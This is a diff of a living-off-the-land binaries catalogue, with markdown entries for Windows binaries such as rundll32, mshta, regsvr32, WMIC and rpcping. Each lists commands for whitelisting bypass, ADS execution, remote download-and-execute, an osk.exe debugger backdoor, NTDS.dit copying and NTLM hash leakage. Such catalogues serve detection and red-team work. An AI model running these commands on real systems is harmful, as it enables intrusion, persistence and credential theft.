Kyle Hanslovan - @KyleHanslovan
|
||||
|
||||
|
16
OSBinaries/Pcwrun.exe.md
Normal file
16
OSBinaries/Pcwrun.exe.md
Normal file
@ -0,0 +1,16 @@
|
||||
## Pcwrun.exe
|
||||
* Functions: Execute
|
||||
```
|
||||
|
||||
Pcwrun.exe c:\temp\beacon.exe
|
||||
Open the target .EXE file with the Program Compatibility Wizard.
|
||||
```
|
||||
|
||||
* Resources:
|
||||
* https://twitter.com/pabraeken/status/991335019833708544
|
||||
|
||||
* Full path:
|
||||
* c:\windows\system32\pcwrun.exe
|
||||
|
||||
* Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken
|
||||
|
17
OSBinaries/Powershell.exe.md
Normal file
17
OSBinaries/Powershell.exe.md
Normal file
@ -0,0 +1,17 @@
|
||||
## Powershell.exe
|
||||
* Functions: Execute, Read ADS
|
||||
```
|
||||
|
||||
powershell -ep bypass - < c:\temp:ttt
|
||||
Execute the encoded PowerShell command stored in an Alternate Data Stream (ADS).
|
||||
```
|
||||
|
||||
* Resources:
|
||||
* https://twitter.com/Moriarty_Meng/status/984380793383370752
|
||||
|
||||
* Full path:
|
||||
* C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
||||
* C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
||||
|
||||
* Notes: Thanks to Moriarty - @Moriarty_Meng
|
||||
|
18
OSBinaries/PresentationHost.exe.md
Normal file
18
OSBinaries/PresentationHost.exe.md
Normal file
@ -0,0 +1,18 @@
|
||||
## PresentationHost.exe
|
||||
* Functions: Execute
|
||||
```
|
||||
|
||||
Presentationhost.exe C:\temp\Evil.xbap
|
||||
Executes the target XAML Browser Application (XBAP) file.
|
||||
```
|
||||
|
||||
* Resources:
|
||||
* https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf
|
||||
* https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/
|
||||
|
||||
* Full path:
|
||||
* c:\windows\system32\PresentationHost.exe
|
||||
* c:\windows\sysWOW64\PresentationHost.exe
|
||||
|
||||
* Notes: Thanks to Casey Smith - @subtee
|
||||
|
24
OSBinaries/Print.exe.md
Normal file
24
OSBinaries/Print.exe.md
Normal file
@ -0,0 +1,24 @@
|
||||
## Print.exe
|
||||
* Functions: Download, Copy, Add ADS
|
||||
```
|
||||
|
||||
print /D:C:\ADS\File.txt:file.exe C:\ADS\File.exe
|
||||
Copy file.exe into the Alternate Data Stream (ADS) of file.txt.
|
||||
|
||||
print /D:C:\ADS\CopyOfFile.exe C:\ADS\FileToCopy.exe
|
||||
Copy FileToCopy.exe to the target C:\ADS\CopyOfFile.exe
|
||||
|
||||
print /D:C:\OutFolder\outfile.exe \\WebDavServer\Folder\File.exe
|
||||
Copy File.exe from a network share to the target c:\OutFolder\outfile.exe.
|
||||
```
|
||||
|
||||
* Resources:
|
||||
* https://twitter.com/Oddvarmoe/status/985518877076541440
|
||||
* https://www.youtube.com/watch?v=nPBcSP8M7KE&lc=z22fg1cbdkabdf3x404t1aokgwd2zxasf2j3rbozrswnrk0h00410
|
||||
|
||||
* Full path:
|
||||
* C:\Windows\System32\print.exe
|
||||
* C:\Windows\SysWOW64\print.exe
|
||||
|
||||
* Notes: Thanks to Oddvar Moe - @oddvarmoe
|
||||
|
23
OSBinaries/Psr.exe.md
Normal file
23
OSBinaries/Psr.exe.md
Normal file
@ -0,0 +1,23 @@
|
||||
## Psr.exe
|
||||
* Functions: Surveillance
|
||||
```
|
||||
|
||||
psr.exe /start /gui 0 /output c:\users\user\out.zip
|
||||
Capture screenshots of the desktop and save them in the target .ZIP file.
|
||||
|
||||
psr.exe /start /maxsc 100 /gui 0 /output c:\users\user\out.zip
|
||||
Capture a maximum of 100 screenshots of the desktop and save them in the target .ZIP file.
|
||||
|
||||
psr.exe /stop
|
||||
Stop the Problem Step Recorder.
|
||||
```
|
||||
|
||||
* Resources:
|
||||
* https://www.sans.org/summit-archives/file/summit-archive-1493861893.pdf
|
||||
|
||||
* Full path:
|
||||
* C:\Windows\System32\Psr.exe
|
||||
* C:\Windows\SysWOW64\Psr.exe
|
||||
|
||||
* Notes: Thanks to
|
||||
|
25
OSBinaries/Regasm.exe.md
Normal file
25
OSBinaries/Regasm.exe.md
Normal file
@ -0,0 +1,25 @@
|
||||
## Regasm.exe
|
||||
* Functions: Execute
|
||||
```
|
||||
|
||||
regasm.exe /U AllTheThingsx64.dll
|
||||
Loads the target .DLL file and executes the UnRegisterClass function.
|
||||
|
||||
regasm.exe AllTheThingsx64.dll
|
||||
Loads the target .DLL file and executes the RegisterClass function.
|
||||
```
|
||||
|
||||
* Resources:
|
||||
* https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/
|
||||
* https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/RegSvcsRegAsmBypass.cs
|
||||
* https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/RegsvcsRegasm.md
|
||||
* https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
|
||||
|
||||
* Full path:
|
||||
* C:\Windows\Microsoft.NET\Framework\v2.0.50727\regasm.exe
|
||||
* C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regasm.exe
|
||||
* C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
|
||||
* C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe
|
||||
|
||||
* Notes: Thanks to Casey Smith - @subtee
|
||||
|
17
OSBinaries/Register-cimprovider.exe.md
Normal file
17
OSBinaries/Register-cimprovider.exe.md
Normal file
@ -0,0 +1,17 @@
|
||||
## Register-cimprovider.exe
|
||||
* Functions: Execute
|
||||
```
|
||||
|
||||
Register-cimprovider -path "C:\folder\evil.dll"
|
||||
Load the target .DLL.
|
||||
```
|
||||
|
||||
* Resources:
|
||||
* https://twitter.com/PhilipTsukerman/status/992021361106268161
|
||||
|
||||
* Full path:
|
||||
* c:\windows\system32\Register-cimprovider.exe
|
||||
* c:\windows\sysWOW64\Register-cimprovider.exe
|
||||
|
||||
* Notes: Thanks to PhilipTsukerman - @PhilipTsukerman
|
||||
|
22
OSBinaries/Regsvcs.exe.md
Normal file
22
OSBinaries/Regsvcs.exe.md
Normal file
@ -0,0 +1,22 @@
|
||||
## Regsvcs.exe
|
||||
* Functions: Execute
|
||||
```
|
||||
|
||||
regsvcs.exe AllTheThingsx64.dll
|
||||
Loads the target .DLL file and executes the RegisterClass function.
|
||||
```
|
||||
|
||||
* Resources:
|
||||
* https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/
|
||||
* https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/RegSvcsRegAsmBypass.cs
|
||||
* https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/RegsvcsRegasm.md
|
||||
* https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
|
||||
|
||||
* Full path:
|
||||
* C:\Windows\Microsoft.NET\Framework\v2.0.50727\regsvcs.exe
|
||||
* C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regsvcs.exe
|
||||
* C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
|
||||
* C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe
|
||||
|
||||
* Notes: Thanks to Casey Smith - @subtee
|
||||
|
22
OSBinaries/Regsvr32.exe.md
Normal file
22
OSBinaries/Regsvr32.exe.md
Normal file
@ -0,0 +1,22 @@
|
||||
## Regsvr32.exe
|
||||
* Functions: Execute
|
||||
```
|
||||
|
||||
regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll
|
||||
Execute the specified remote .SCT script with scrobj.dll.
|
||||
|
||||
|
||||
Execute the specified local .SCT script with scrobj.dll.
|
||||
```
|
||||
|
||||
* Resources:
|
||||
* https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/Regsvr32.md
|
||||
* https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
|
||||
* https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/
|
||||
|
||||
* Full path:
|
||||
* C:\Windows\System32\regsvr32.exe
|
||||
* C:\Windows\SysWOW64\regsvr32.exe
|
||||
|
||||
* Notes: Thanks to Casey Smith - @subtee
|
||||
|
21
OSBinaries/Replace.exe.md
Normal file
21
OSBinaries/Replace.exe.md
Normal file
@ -0,0 +1,21 @@
|
||||
## Replace.exe
|
||||
* Functions: Copy, Download
|
||||
```
|
||||
|
||||
replace.exe C:\Source\File.cab C:\Destination /A
|
||||
Copy the specified file to the destination folder.
|
||||
|
||||
replace.exe \\webdav.host.com\foo\bar.exe c:\outdir /A
|
||||
Copy the specified file to the destination folder.
|
||||
```
|
||||
|
||||
* Resources:
|
||||
* https://twitter.com/elceef/status/986334113941655553
|
||||
* https://twitter.com/elceef/status/986842299861782529
|
||||
|
||||
* Full path:
|
||||
* C:\Windows\System32\replace.exe
|
||||
* C:\Windows\SysWOW64\replace.exe
|
||||
|
||||
* Notes: Thanks to elceef - @elceef
|
||||
|
20
OSBinaries/Robocopy.exe.md
Normal file
20
OSBinaries/Robocopy.exe.md
Normal file
@ -0,0 +1,20 @@
|
||||
## Robocopy.exe
|
||||
* Functions: Copy
|
||||
```
|
||||
|
||||
Robocopy.exe C:\SourceFolder C:\DestFolder
|
||||
Copy the entire contents of the SourceFolder to the DestFolder.
|
||||
|
||||
Robocopy.exe \\SERVER\SourceFolder C:\DestFolder
|
||||
Copy the entire contents of the SourceFolder to the DestFolder.
|
||||
```
|
||||
|
||||
* Resources:
|
||||
* https://social.technet.microsoft.com/wiki/contents/articles/1073.robocopy-and-a-few-examples.aspx
|
||||
|
||||
* Full path:
|
||||
* c:\windows\system32\binary.exe
|
||||
* c:\windows\sysWOW64\binary.exe
|
||||
|
||||
* Notes: Thanks to Name of guy - @twitterhandle
|
||||
|
26
OSBinaries/Rpcping.exe.md
Normal file
26
OSBinaries/Rpcping.exe.md
Normal file
@ -0,0 +1,26 @@
|
||||
## Rpcping.exe
|
||||
* Functions: Credentials
|
||||
```
|
||||
|
||||
rpcping -s 127.0.0.1 -t ncacn_np
|
||||
Send a RPC test connection to the target server (-s) sending the password hash in the process.
|
||||
|
||||
rpcping -s 192.168.1.10 -ncacn_np
|
||||
Send a RPC test connection to the target server (-s) sending the password hash in the process.
|
||||
|
||||
rpcping -s 127.0.0.1 -e 1234 -a privacy -u NTLM
|
||||
Send a RPC test connection to the target server (-s) and force the NTLM hash to be sent in the process.
|
||||
```
|
||||
|
||||
* Resources:
|
||||
* https://twitter.com/subtee/status/872797890539913216
|
||||
* https://github.com/vysec/RedTips
|
||||
* https://twitter.com/vysecurity/status/974806438316072960
|
||||
* https://twitter.com/vysecurity/status/873181705024266241
|
||||
|
||||
* Full path:
|
||||
* C:\Windows\System32\rpcping.exe
|
||||
* C:\Windows\SysWOW64\rpcping.exe
|
||||
|
||||
* Notes: Thanks to Casey Smith - @subtee, Vincent Yiu - @vysecurity
|
||||
|
36
OSBinaries/Rundll32.exe.md
Normal file
36
OSBinaries/Rundll32.exe.md
Normal file
@ -0,0 +1,36 @@
|
||||
## Rundll32.exe
|
||||
* Functions: Execute, Read ADS
|
||||
```
|
||||
|
||||
rundll32.exe AllTheThingsx64,EntryPoint
|
||||
Example command. AllTheThingsx64 would be a .DLL file and EntryPoint would be the name of the entry point in the .DLL file to execute.
|
||||
|
||||
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');"
|
||||
Use Rundll32.exe to execute a JavaScript script that runs a PowerShell script that is downloaded from a remote web site.
|
||||
|
||||
rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("w=new%20ActiveXObject(\"WScript.Shell\");w.run(\"calc\");window.close()");
|
||||
Use Rundll32.exe to execute a JavaScript script that runs calc.exe.
|
||||
|
||||
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}
|
||||
Use Rundll32.exe to execute a JavaScript script that runs calc.exe and then kills the Rundll32.exe process that was started.
|
||||
|
||||
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/3gstudent/Javascript-Backdoor/master/test")
|
||||
Use Rundll32.exe to execute a JavaScript script that calls a remote JavaScript script.
|
||||
|
||||
rundll32 "C:\ads\file.txt:ADSDLL.dll",DllMain
|
||||
Use Rundll32.exe to execute a .DLL file stored in an Alternate Data Stream (ADS).
|
||||
```
|
||||
|
||||
* Resources:
|
||||
* https://pentestlab.blog/2017/05/23/applocker-bypass-rundll32/
|
||||
* https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_7
|
||||
* https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/Rundll32.md
|
||||
* https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
|
||||
* https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/
|
||||
|
||||
* Full path:
|
||||
* C:\Windows\System32\rundll32.exe
|
||||
* C:\Windows\SysWOW64\rundll32.exe
|
||||
|
||||
* Notes: Thanks to Casey Smith - @subtee
|
||||
|
19
OSBinaries/Runonce.exe.md
Normal file
19
OSBinaries/Runonce.exe.md
Normal file
@ -0,0 +1,19 @@
|
||||
## Runonce.exe
|
||||
* Functions: Execute
|
||||
```
|
||||
|
||||
Runonce.exe /AlternateShellStartup
|
||||
Executes a Run Once Task that has been configured in the registry.
|
||||
```
|
||||
|
||||
* Resources:
|
||||
* https://twitter.com/pabraeken/status/990717080805789697
|
||||
* https://cmatskas.com/configure-a-runonce-task-on-windows/
|
||||
|
||||
* Full path:
|
||||
* c:\windows\system32\runonce.exe
|
||||
* c:\windows\sysWOW64\runonce.exe
|
||||
|
||||
* Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken
|
||||
Requires Administrative access.
|
||||
|
17
OSBinaries/Runscripthelper.exe.md
Normal file
17
OSBinaries/Runscripthelper.exe.md
Normal file
@ -0,0 +1,17 @@
|
||||
## Runscripthelper.exe
|
||||
* Functions: Execute
|
||||
```
|
||||
|
||||
runscripthelper.exe surfacecheck \\?\C:\Test\Microsoft\Diagnosis\scripts\test.txt C:\Test
|
||||
Execute the PowerShell script named test.txt.
|
||||
```
|
||||
|
||||
* Resources:
|
||||
* https://posts.specterops.io/bypassing-application-whitelisting-with-runscripthelper-exe-1906923658fc
|
||||
|
||||
* Full path:
|
||||
* C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.15_none_c2df1bba78111118\Runscripthelper.exe
|
||||
* C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.192_none_ad4699b571e00c4a\Runscripthelper.exe
|
||||
|
||||
* Notes: Thanks to Matt Graeber - @mattifestation
|
||||
|
19
OSBinaries/SC.exe.md
Normal file
19
OSBinaries/SC.exe.md
Normal file
@ -0,0 +1,19 @@
|
||||
## SC.exe
|
||||
* Functions: Execute, Read ADS, Create Service, Start Service
|
||||
```
|
||||
|
||||
sc create evilservice binPath="\"c:\\ADS\\file.txt:cmd.exe\" /c echo works > \"c:\ADS\works.txt\"" DisplayName= "evilservice" start= auto
|
||||
sc start evilservice
|
||||
|
||||
|
||||
```
|
||||
|
||||
* Resources:
|
||||
* https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/
|
||||
|
||||
* Full path:
|
||||
* C:\Windows\System32\sc.exe
|
||||
* C:\Windows\SysWOW64\sc.exe
|
||||
|
||||
* Notes: Thanks to Oddvar Moe - @oddvarmoe
|
||||
|
22
OSBinaries/Scriptrunner.exe.md
Normal file
22
OSBinaries/Scriptrunner.exe.md
Normal file
@ -0,0 +1,22 @@
|
||||
## Scriptrunner.exe
|
||||
* Functions: Execute
|
||||
```
|
||||
|
||||
Scriptrunner.exe -appvscript calc.exe
|
||||
Execute calc.exe.
|
||||
|
||||
ScriptRunner.exe -appvscript "\\fileserver\calc.cmd"
|
||||
Execute the calc.cmd script on the remote share.
|
||||
```
|
||||
|
||||
* Resources:
|
||||
* https://twitter.com/KyleHanslovan/status/914800377580503040
|
||||
* https://twitter.com/NickTyrer/status/914234924655312896
|
||||
* https://github.com/MoooKitty/Code-Execution
|
||||
|
||||
* Full path:
|
||||
* c:\windows\system32\scriptrunner.exe
|
||||
* c:\windows\sysWOW64\scriptrunner.exe
|
||||
|
||||
* Notes: Thanks to Nick Tyrer - @NickTyrer
|
||||
|
16
OSBinaries/SyncAppvPublishingServer.exe.md
Normal file
16
OSBinaries/SyncAppvPublishingServer.exe.md
Normal file
@ -0,0 +1,16 @@
|
||||
## SyncAppvPublishingServer.exe
|
||||
* Functions: Execute
|
||||
```
|
||||
|
||||
SyncAppvPublishingServer.exe "n;(New-Object Net.WebClient).DownloadString('http://some.url/script.ps1') | IEX"
|
||||
Example command on how inject Powershell code into the process
|
||||
```
|
||||
|
||||
* Resources:
|
||||
* https://twitter.com/monoxgas/status/895045566090010624
|
||||
|
||||
* Full path:
|
||||
* C:\Windows\System32\SyncAppvPublishingServer.exe
|
||||
|
||||
* Notes: Thanks to Nick Landers - @monoxgas
|
||||
|
58
OSBinaries/WMIC.exe.md
Normal file
58
OSBinaries/WMIC.exe.md
Normal file
@ -0,0 +1,58 @@
|
||||
## WMIC.exe
|
||||
* Functions: Reconnaissance, Execute, Read ADS
|
||||
```
|
||||
|
||||
wmic.exe process call create calc
|
||||
Execute calc.exe.
|
||||
|
||||
wmic.exe process call create "c:\ads\file.txt:program.exe"
|
||||
Execute a .EXE file stored as an Alternate Data Stream (ADS).
|
||||
|
||||
wmic.exe useraccount get /ALL
|
||||
List the user accounts on the machine.
|
||||
|
||||
wmic.exe process get caption,executablepath,commandline
|
||||
Gets the command line used to execute a running program.
|
||||
|
||||
wmic.exe qfe get description,installedOn /format:csv
|
||||
Gets a list of installed Windows updates.
|
||||
|
||||
wmic.exe /node:"192.168.0.1" service where (caption like "%sql server (%")
|
||||
Check to see if the target system is running SQL.
|
||||
|
||||
get-wmiobject –class "win32_share" –namespace "root\CIMV2" –computer "targetname"
|
||||
Use the PowerShell cmdlet to list the shares on a remote server.
|
||||
|
||||
wmic.exe /user:<username> /password:<password> /node:<computer_name> process call create "C:\Windows\system32\reg.exe add \"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\" /t REG_SZ /d \"cmd.exe\" /f"
|
||||
Add cmd.exe as a debugger for the osk.exe process. Each time osk.exe is run, cmd.exe will be run as well.
|
||||
|
||||
wmic.exe /node:"192.168.0.1" process call create "evil.exe"
|
||||
Execute evil.exe on the remote system.
|
||||
|
||||
wmic.exe /node:REMOTECOMPUTERNAME PROCESS call create "at 9:00PM c:\GoogleUpdate.exe ^> c:\notGoogleUpdateResults.txt"
|
||||
Create a scheduled execution of C:\GoogleUpdate.exe to run at 9pm.
|
||||
|
||||
wmic.exe /node:REMOTECOMPUTERNAME PROCESS call create "cmd /c vssadmin create shadow /for=C:\Windows\NTDS\NTDS.dit > c:\not_the_NTDS.dit"
|
||||
Create a volume shadow copy of NTDS.dit that can be copied.
|
||||
|
||||
wmic.exe process get brief /format:"https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Wmic_calc.xsl"
|
||||
Execute a script contained in the target .XSL file hosted on a remote server.
|
||||
|
||||
wmic.exe os get /format:"MYXSLFILE.xsl"
|
||||
Executes JScript or VBScript embedded in the target XSL stylesheet.
|
||||
|
||||
wmic.exe process get brief /format:"\\127.0.0.1\c$\Tools\pocremote.xsl"
|
||||
Executes JScript or VBScript embedded in the target remote XSL stylsheet.
|
||||
```
|
||||
|
||||
* Resources:
|
||||
* https://stackoverflow.com/questions/24658745/wmic-how-to-use-process-call-create-with-a-specific-working-directory
|
||||
* https://subt0x11.blogspot.no/2018/04/wmicexe-whitelisting-bypass-hacking.html
|
||||
* https://twitter.com/subTee/status/986234811944648707
|
||||
|
||||
* Full path:
|
||||
* c:\windows\system32\wbem\wmic.exe
|
||||
* c:\windows\sysWOW64\wbem\wmic.exe
|
||||
|
||||
* Notes: Thanks to Casey Smith - @subtee
|
||||
|
19
OSBinaries/Wab.exe.md
Normal file
19
OSBinaries/Wab.exe.md
Normal file
@ -0,0 +1,19 @@
|
||||
## Wab.exe
|
||||
* Functions: Execute
|
||||
```
|
||||
|
||||
Wab.exe
|
||||
Loads a DLL configured in the registry under HKLM.
|
||||
```
|
||||
|
||||
* Resources:
|
||||
* http://www.hexacorn.com/blog/2018/05/01/wab-exe-as-a-lolbin/
|
||||
* https://twitter.com/Hexacorn/status/991447379864932352
|
||||
|
||||
* Full path:
|
||||
* C:\Program Files\Windows Mail\wab.exe
|
||||
* C:\Program Files (x86)\Windows Mail\wab.exe
|
||||
|
||||
* Notes: Thanks to Adam - @Hexacorn
|
||||
Requires registry changes, Requires Administrative Access
|
||||
|
17
OSBinaries/Wscript.exe.md
Normal file
17
OSBinaries/Wscript.exe.md
Normal file
@ -0,0 +1,17 @@
|
||||
## Wscript.exe
|
||||
* Functions: Execute, Read ADS
|
||||
```
|
||||
|
||||
wscript c:\ads\file.txt:script.vbs
|
||||
Executes the .VBS script stored as an Alternate Data Stream (ADS).
|
||||
```
|
||||
|
||||
* Resources:
|
||||
* ?
|
||||
|
||||
* Full path:
|
||||
* c:\windows\system32\wscript.exe
|
||||
* c:\windows\sysWOW64\wscript.exe
|
||||
|
||||
* Notes: Thanks to ?
|
||||
|
22
OSBinaries/Xwizard.exe.md
Normal file
22
OSBinaries/Xwizard.exe.md
Normal file
@ -0,0 +1,22 @@
|
||||
## Xwizard.exe
|
||||
* Functions: DLL hijack, Execute
|
||||
```
|
||||
|
||||
xwizard.exe
|
||||
Xwizard.exe will load a .DLL file located in the same directory (DLL Hijack) named xwizards.dll.
|
||||
|
||||
xwizard RunWizard {00000001-0000-0000-0000-0000FEEDACDC}
|
||||
Xwizard.exe running a custom class that has been added to the registry.
|
||||
```
|
||||
|
||||
* Resources:
|
||||
* http://www.hexacorn.com/blog/2017/07/31/the-wizard-of-x-oppa-plugx-style/
|
||||
* https://www.youtube.com/watch?v=LwDHX7DVHWU
|
||||
* https://gist.github.com/NickTyrer/0598b60112eaafe6d07789f7964290d5
|
||||
|
||||
* Full path:
|
||||
* c:\windows\system32\xwizard.exe
|
||||
* c:\windows\sysWOW32\xwizard.exe
|
||||
|
||||
* Notes: Thanks to Adam - @Hexacorn, Nick Tyrer - @nicktyrer
|
||||
|
26
OSBinaries/hh.exe.md
Normal file
26
OSBinaries/hh.exe.md
Normal file
@ -0,0 +1,26 @@
|
||||
## hh.exe
|
||||
* Functions: Download, Execute
|
||||
```
|
||||
|
||||
HH.exe http://www.google.com
|
||||
Opens google's web page with HTML Help.
|
||||
|
||||
HH.exe C:\
|
||||
Opens c:\\ with HTML Help.
|
||||
|
||||
HH.exe c:\windows\system32\calc.exe
|
||||
Opens calc.exe with HTML Help.
|
||||
|
||||
HH.exe http://some.url/script.ps1
|
||||
Open the target PowerShell script with HTML Help.
|
||||
```
|
||||
|
||||
* Resources:
|
||||
* https://oddvar.moe/2017/08/13/bypassing-device-guard-umci-using-chm-cve-2017-8625/
|
||||
|
||||
* Full path:
|
||||
* c:\windows\system32\hh.exe
|
||||
* c:\windows\sysWOW64\hh.exe
|
||||
|
||||
* Notes: Thanks to Oddvar Moe - @oddvarmoe
|
||||
|
30
OSBinaries/mshta.exe.md
Normal file
30
OSBinaries/mshta.exe.md
Normal file
@ -0,0 +1,30 @@
|
||||
## mshta.exe
|
||||
* Functions: Execute, Read ADS
|
||||
```
|
||||
|
||||
mshta.exe evilfile.hta
|
||||
Opens the target .HTA and executes embedded JavaScript, JScript, or VBScript.
|
||||
|
||||
mshta.exe vbscript:Close(Execute("GetObject(""script:https[:]//webserver/payload[.]sct"")"))
|
||||
Executes VBScript supplied as a command line argument.
|
||||
|
||||
mshta.exe javascript:a=GetObject("script:https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Mshta_calc.sct").Exec();close();
|
||||
Executes JavaScript supplied as a command line argument.
|
||||
|
||||
mshta.exe "C:\ads\file.txt:file.hta"
|
||||
Opens the target .HTA and executes embedded JavaScript, JScript, or VBScript.
|
||||
```
|
||||
|
||||
* Resources:
|
||||
* https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/Mshta.md
|
||||
* https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_4
|
||||
* https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/mshta.sct
|
||||
* https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/
|
||||
* https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/
|
||||
|
||||
* Full path:
|
||||
* C:\Windows\System32\mshta.exe
|
||||
* C:\Windows\SysWOW64\mshta.exe
|
||||
|
||||
* Notes: Thanks to Casey Smith - @subtee, Oddvar Moe - @oddvarmoe
|
||||
|
21
OSBinaries/odbcconf.exe.md
Normal file
21
OSBinaries/odbcconf.exe.md
Normal file
@ -0,0 +1,21 @@
|
||||
## odbcconf.exe
|
||||
* Functions: Execute
|
||||
```
|
||||
|
||||
odbcconf -f file.rsp
|
||||
Load DLL specified in target .RSP file.
|
||||
```
|
||||
|
||||
* Resources:
|
||||
* https://gist.github.com/NickTyrer/6ef02ce3fd623483137b45f65017352b
|
||||
* https://github.com/woanware/application-restriction-bypasses
|
||||
* https://twitter.com/subTee/status/789459826367606784
|
||||
|
||||
* Full path:
|
||||
* c:\windows\system32\odbcconf.exe
|
||||
* c:\windows\sysWOW64\odbcconf.exe
|
||||
|
||||
* Notes: Thanks to Casey Smith - @subtee, Nick Tyrer - @NickTyrer
|
||||
See the Playloads folder for an example .RSP file.
|
||||
|
||||
|
17
OSBinaries/reg.exe.md
Normal file
17
OSBinaries/reg.exe.md
Normal file
@ -0,0 +1,17 @@
|
||||
## reg.exe
|
||||
* Functions: Export Reg, Add ADS, Import Reg
|
||||
```
|
||||
|
||||
reg export HKLM\SOFTWARE\Microsoft\Evilreg c:\ads\file.txt:evilreg.reg
|
||||
Export the target Registry key and save it to the specified .REG file.
|
||||
```
|
||||
|
||||
* Resources:
|
||||
* https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
|
||||
|
||||
* Full path:
|
||||
* c:\windows\system32\reg.exe
|
||||
* c:\windows\sysWOW64\reg.exe
|
||||
|
||||
* Notes: Thanks to Oddvar Moe - @oddvarmoe
|
||||
|
20
OSBinaries/regedit.exe.md
Normal file
20
OSBinaries/regedit.exe.md
Normal file
@ -0,0 +1,20 @@
|
||||
## regedit.exe
|
||||
* Functions: Write ADS, Read ADS, Import registry
|
||||
```
|
||||
|
||||
regedit /E c:\ads\file.txt:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey
|
||||
Export the target Registry key to the specified .REG file.
|
||||
|
||||
regedit C:\ads\file.txt:regfile.reg"
|
||||
Import the target .REG file into the Registry.
|
||||
```
|
||||
|
||||
* Resources:
|
||||
* https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
|
||||
|
||||
* Full path:
|
||||
* C:\Windows\System32\regedit.exe
|
||||
* C:\Windows\SysWOW64\regedit.exe
|
||||
|
||||
* Notes: Thanks to Oddvar Moe - @oddvarmoe
|
||||
|
32
OSLibraries/Advpack.dll.md
Normal file
32
OSLibraries/Advpack.dll.md
Normal file
@ -0,0 +1,32 @@
|
||||
## Advpack.dll
|
||||
* Functions: Execute
|
||||
```
|
||||
|
||||
rundll32.exe advpack.dll,LaunchINFSection c:\\test.inf,DefaultInstall_SingleUser,1,
|
||||
Remote fetch and execute a COM Scriptlet by calling an information file directive (Section name specified).
|
||||
|
||||
rundll32.exe advpack.dll,LaunchINFSection test.inf,,1,
|
||||
Remote fetch and execute a COM Scriptlet by calling an information file directive (DefaultInstall section implied).
|
||||
|
||||
rundll32.exe Advpack.dll,RegisterOCX calc.exe
|
||||
Launch executable by calling the RegisterOCX function.
|
||||
|
||||
rundll32 advpack.dll, RegisterOCX "cmd.exe /c calc.exe"
|
||||
Launch executable by calling the RegisterOCX function.
|
||||
|
||||
rundll32.exe Advpack.dll,RegisterOCX test.dll
|
||||
Launch a DLL payload by calling the RegisterOCX function.
|
||||
```
|
||||
|
||||
* Resources:
|
||||
* https://bohops.com/2018/02/26/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence/
|
||||
* https://twitter.com/ItsReallyNick/status/967859147977850880
|
||||
* https://twitter.com/bohops/status/974497123101179904
|
||||
* https://twitter.com/moriarty_meng/status/977848311603380224
|
||||
|
||||
* Full path:
|
||||
* c:\windows\system32\advpack.dll
|
||||
* c:\windows\sysWOW64\advpack.dll
|
||||
|
||||
* Notes: Thanks to Jimmy - @bohops (LaunchINFSection), fabrizio - @0rbz_ (RegisterOCX - DLL), Moriarty @moriarty_meng (RegisterOCX - Cmd)
|
||||
|
28
OSLibraries/Ieadvpack.dll.md
Normal file
28
OSLibraries/Ieadvpack.dll.md
Normal file
@ -0,0 +1,28 @@
|
||||
## Ieadvpack.dll
|
||||
